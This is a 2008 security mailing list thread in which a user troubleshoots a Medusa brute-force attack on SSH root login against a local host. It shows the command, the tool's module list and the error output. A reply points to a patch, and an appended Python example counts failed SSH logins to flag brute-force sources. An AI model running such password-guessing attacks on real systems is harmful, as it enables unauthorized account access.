Security Basics mailing list archives

Re: attack ssh with medusa


From: Adam Hostetler <ahostetler () microsolved com>
Date: Thu, 21 Aug 2008 20:25:01 -0400

There's a patch for this on the foofus-tools list.

http://lists.foofus.net/pipermail/foofus-tools-foofus.net/

Look in the archives in August 08.

Sergio Ruiz wrote:
Hi,

I have Medusa on the Ubuntu 7.10 distribution.
$ medusa -V
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>


with ssh.mod activated:

$ medusa -q
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.1.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + nntp.mod : Brute force module for NNTP sessions : version 0.9
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.1.1
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.9.1
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + telnet.mod : Brute force module for telnet sessions : version 1.2.1
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.0
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + wrapper.mod : Generic Wrapper Module : version 1.0.1



When I start the attack, I have a problem:
$ medusa -h 192.168.1.2 -u root -P /home/sergi/John_Passw/D8.DIC  -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>

ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: - (1/106626)
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: . (2/106626)
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,m (3/106626)
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,mn (4/106626)
ERROR: Failed to retrieve supported authentication modes. Aborting...
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,mnb (5/106626)
$


On the victim PC:
Aug 21 08:27:41 192.168.1.2 sshd[12649]: Failed password for root from 192.168.1.3 port 45652 ssh2
Aug 21 08:27:48 192.168.1.2 last message repeated 3 times



What is the problem?

Thanks..




--
_______________________________________________________________________
Adam Hostetler                    ahostetler () microsolved com
Security Engineer                 (614) 351-1237 x 204
PGP Key Available by Request
MicroSolved is security expertise you can trust!

HoneyPoint Security Server
Attackers get stung, instead of you!
http://www.microsolved.com/honeypoint
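
A defender-side view of the sshd log excerpt quoted above, as an added example that is not part of the original thread: it counts failed SSH logins per source while expanding syslog's "last message repeated N times" lines, which a plain count of "Failed password" lines would miss. The extra log lines, the function names and the threshold of 4 are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample: the first two lines mirror the thread, the rest are made up.
SAMPLE_LOG = """\
Aug 21 08:27:41 192.168.1.2 sshd[12649]: Failed password for root from 192.168.1.3 port 45652 ssh2
Aug 21 08:27:48 192.168.1.2 last message repeated 3 times
Aug 21 08:28:02 192.168.1.2 sshd[12660]: Accepted password for alice from 192.168.1.7 port 50211 ssh2
Aug 21 08:28:05 192.168.1.2 last message repeated 2 times
Aug 21 08:29:10 192.168.1.2 sshd[12671]: Failed password for invalid user admin from 192.168.1.9 port 40100 ssh2
"""

FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
REPEATED = re.compile(r" last message repeated (\d+) times?$")


def count_failures(log_text):
    """Return Counter {(source, user): failures}, expanding syslog repeats.

    Assumes a log file from a single host, so a repeat marker always
    refers to the line directly before it.
    """
    counts = Counter()
    last_key = None  # key of the previous message if it was a failure
    for line in log_text.splitlines():
        rep = REPEATED.search(line)
        if rep:
            # Only repeats of a failed login add to the count.
            if last_key is not None:
                counts[last_key] += int(rep.group(1))
            continue
        m = FAILED.search(line)
        last_key = (m.group(2), m.group(1)) if m else None
        if last_key:
            counts[last_key] += 1
    return counts


def flag_sources(log_text, threshold=4):
    """Sources whose total failed logins reach the (assumed) threshold."""
    per_source = Counter()
    for (source, _user), n in count_failures(log_text).items():
        per_source[source] += n
    return sorted(s for s, n in per_source.items() if n >= threshold)


if __name__ == "__main__":
    print(dict(count_failures(SAMPLE_LOG)))
    print(flag_sources(SAMPLE_LOG))
```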

